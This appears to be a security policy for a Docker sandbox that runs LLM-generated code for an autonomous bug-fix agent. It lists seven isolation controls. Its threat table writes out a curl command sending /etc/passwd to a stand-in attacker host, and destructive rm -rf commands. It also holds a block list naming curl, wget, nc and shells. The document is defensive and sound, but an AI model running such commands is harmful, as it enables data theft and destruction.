Spaces:
Running
Running
| # Sandbox Security Policy | |
| ## Purpose | |
| This document describes the security controls applied to the Docker-based code execution | |
| sandbox used by the Autonomous Code Review & Bug-Fix Agent. | |
| ## Threat Model | |
| The sandbox runs **untrusted LLM-generated code** and **arbitrary pytest test suites** | |
| from public GitHub repositories. The risk categories are: | |
| | Threat | Example | Control | | |
| |--------|---------|---------| | |
| | Data exfiltration | `curl https://attacker.com/$(cat /etc/passwd)` | `--network=none` | | |
| | Resource exhaustion | Infinite loop / fork bomb | `--memory=2g`, `--cpus=2.0`, 60s timeout | | |
| | Host filesystem access | `open('/etc/passwd')` | `--read-only`, volume-limited | | |
| | Privilege escalation | `sudo rm -rf /` | Non-root user (uid=1000) | | |
| | Malicious commands | `rm -rf /workspace` | Command whitelist | | |
| | Persistent state | Writing outside /workspace | `--read-only` + limited tmpfs | | |
| ## Security Controls (7 Layers) | |
| ### 1. Network Isolation β `--network=none` | |
| The container has **zero network access**. No DNS, no HTTP, no TCP sockets. | |
| This is the most important control β it prevents data exfiltration and | |
| supply-chain attacks from untrusted test dependencies. | |
| ### 2. Memory cgroup β `--memory=2g` | |
| Container is killed by the kernel OOM killer if memory exceeds 2 GB. | |
| Prevents fork bombs and memory exhaustion from affecting the host. | |
| ### 3. CPU cgroup β `--cpus=2.0` | |
| Limits container to 2 CPU cores. Prevents CPU saturation that would | |
| degrade other running containers / the host system. | |
| ### 4. Read-Only Filesystem β `--read-only --tmpfs=/tmp:size=256m` | |
| The container's filesystem is mounted read-only. Only two writable locations: | |
| - `/workspace` β the cloned repo (bind-mounted, scoped to this run) | |
| - `/tmp` β tmpfs, 256 MB, wiped at container exit | |
| ### 5. Command Whitelist β `ALLOWED_COMMANDS` | |
| Before any command reaches Docker, the executor checks the base command name | |
| against an allowlist: `{git, pytest, python, python3, pip, pip3, cat, ls, echo, | |
| find, grep, head, tail, mkdir, cp, mv, touch, chmod}`. | |
| Commands like `rm`, `curl`, `wget`, `bash`, `sh`, `nc` are blocked at this layer. | |
| ### 6. Non-Root User β `uid=1000` | |
| All processes run as `agent:agent (1000:1000)`. If an exploit escapes the | |
| command whitelist, it cannot modify system files or escalate privileges. | |
| ### 7. Timeout β 60 seconds SIGKILL | |
| The executor sets a 60-second hard timeout. The container is killed via | |
| `docker stop --time=0` (SIGKILL) to prevent hung processes from consuming | |
| resources indefinitely. | |
| ## Isolation Per Run | |
| Each SWE-bench instance gets a **fresh temporary directory** as its workspace. | |
| The container is created with `--rm` so it is automatically deleted after each run. | |
| No state persists between runs. | |
| ## Audit Log | |
| Every command executed in the sandbox is logged with: | |
| - instance_id | |
| - command (truncated to first 3 tokens for brevity) | |
| - returncode | |
| - elapsed_seconds | |
| - timed_out flag | |
| Logs are written to `structlog` (JSON format in production) and ingested by | |
| the Prometheus/Grafana observability stack in Phase 8. | |
| ## Known Limitations | |
| - **Conda environments**: Some SWE-bench repos require specific conda environments | |
| with C extensions. The current sandbox uses pip-only install. This may cause | |
| test failures for repos with complex native dependencies. | |
| - **Docker-in-Docker**: The sandbox does not support running Docker inside Docker. | |
| Repos that spawn subprocesses to call Docker will fail at the network level. | |
| - **Flaky tests**: ~8% of SWE-bench issues have non-deterministic tests. These may | |
| burn retries even when the patch is correct. Flagged as `flaky_test` category. | |